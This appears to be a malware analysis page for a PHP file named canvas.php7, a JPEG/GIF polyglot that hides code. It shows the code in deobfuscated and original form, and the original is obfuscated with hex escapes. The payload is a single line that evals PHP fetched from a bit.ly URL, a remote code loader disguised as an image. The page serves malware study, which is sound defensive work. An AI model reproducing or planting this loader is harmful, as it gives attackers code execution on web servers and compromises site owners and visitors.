PHP Malware Analysis

Back to list

Filename: canvas.php7

Tags

URLs
Execution
  • eval
Files
  • file_get_contents

Deobfuscated code

JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90
C




C		

PP"	
}!1AQa"q2#BR$3br	
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz	
w!1AQaq"2B	#3Rbr
$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?"Ex}^L2[G'-vEIƜyTcrO-okZڳG=_Z$i=7m#,1רBZ~1^t2:}O)9\+o6aBuWףNqcQ
(R@{K
HuQTWW{5{]ݮ_7[++^D}FS^^}Xm@W23+._j}QEw)RKYu["u5a)_>W|;E"n6ʼnoIeQ^yE+Q1ڮ3WDE%M=::0yj(0G@_m'҆>_e?ܻjhD/sp۟m.Zf𥢊*4VjXfQͻe+^F[ܤeͻܿ{oWWBWc?4WIm溑c6Fjڕ.Y'_35Fcۈll|>Ҽd4_iz.>3WB8"\#p)絯iz"?+WEIMIɵoڕf)z\ZE"e7AYc[1/ѫ}TGIF89a=<?php 
echo eval("?>" . file_get_contents("https://bit.ly/3e06DyR"));
?>



Original code

JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90
C




C		

PP"	
}!1AQa"q2#BR$3br	
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz	
w!1AQaq"2B	#3Rbr
$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?"Ex}^L2[G'-vEIƜyTcrO-okZڳG=_Z$i=7m#,1רBZ~1^t2:}O)9\+o6aBuWףNqcQ
(R@{K
HuQTWW{5{]ݮ_7[++^D}FS^^}Xm@W23+._j}QEw)RKYu["u5a)_>W|;E"n6ʼnoIeQ^yE+Q1ڮ3WDE%M=::0yj(0G@_m'҆>_e?ܻjhD/sp۟m.Zf𥢊*4VjXfQͻe+^F[ܤeͻܿ{oWWBWc?4WIm溑c6Fjڕ.Y'_35Fcۈll|>Ҽd4_iz.>3WB8"\#p)絯iz"?+WEIMIɵoڕf)z\ZE"e7AYc[1/ѫ}TGIF89a=<?php
/*   __________________________________________________
    |  Obfuscated by YAK Pro - Php Obfuscator  2.0.11  |
    |              on 2021-12-30 00:28:02              |
    |    GitHub: https://github.com/pk-fr/yakpro-po    |
    |__________________________________________________|
*/
echo eval("\x3f\76" . file_get_contents("\x68\x74\164\x70\163\x3a\57\57\142\151\x74\x2e\154\171\57\63\145\x30\66\104\171\x52"));
?>